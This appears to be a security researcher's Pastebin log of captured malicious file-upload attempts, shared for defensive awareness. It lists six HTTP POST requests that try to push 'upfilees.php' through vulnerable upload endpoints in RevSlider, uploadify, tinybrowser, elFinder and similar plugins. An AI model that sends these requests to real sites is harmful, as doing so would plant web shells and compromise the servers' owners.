API tools faq
paste
Neonprimetime

Malicious File Upload attempts upfilees.php uploadboundary

Neonprimetime
May 31st, 2016
280
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.21 KB | None | 0 0
raw download clone embed print report
  1. Malicious File Upload attempts
  2. *******
  3. *******
  4. *******
  5. POST / HTTP/1.1
  6. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  7. Accept: */*
  8. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  9. Host: www.mysite.com
  10. Content-Length: 340
  11. Connection: Close
  12. yiw_contact[]=upfilees.php
  13. yiw_action=sendemail
  14. id_form=
  15. *******
  16. POST /license.php HTTP/1.1
  17. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  18. Accept: */*
  19. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  20. Host: www.mysite.com
  21. Content-Length: 250
  22. Connection: Close
  23. filename=upfilees.php
  24. 1=
  25. *******
  26. POST /wp-admin/admin-ajax.php HTTP/1.1
  27. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  28. Accept: */*
  29. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  30. Host: www.mysite.com
  31. Content-Length: 360
  32. Connection: Close
  33. update_file=upfilees.php
  34. action=revslider_ajax_action
  35. client_action=
  36. *******
  37. POST/uploadify/uploadify.php?folder=/ HTTP/1.1
  38. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  39. Accept: */*
  40. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  41. Host: www.mysite.com
  42. Content-Length: 241
  43. Connection: Close
  44. Filedata=upfilees.php
  45. 1=
  46. *******
  47. POST/tiny_mce/plugins/tinybrowser/upload_file.php?folder=/&type=file&feid=&obfuscate=&sessidpass= HTTP/1.1
  48. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  49. Accept: */*
  50. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  51. Host: www.mysite.com
  52. Content-Length: 358
  53. Connection: Close
  54. Filedata=upfilees.php.suspected
  55. Filename=send.php.suspected
  56. Upload=
  57. *******
  58. POST /sites/all/libraries/elfinder/php/connector.minimal.php HTTP/1.1
  59. User-Agent: Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0
  60. Accept: */*
  61. Content-Type: multipart/form-data; boundary=(UploadBoundary)
  62. Host: www.mysite.com
  63. Content-Length: 394
  64. Connection: Close
  65. upload[]=upfilees.php
  66. cmd=upload
  67. target=l1_Lw
  68. html=
  69. *******
  70. *******
  71. *******
  72. More FROM @neonprimetime security
  73.  
  74. http://pastebin.com/u/Neonprimetime
  75. https://www.virustotal.com/en/USER/neonprimetime/
  76. https://twitter.com/neonprimetime
  77. https://www.reddit.com/USER/neonprimetime
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!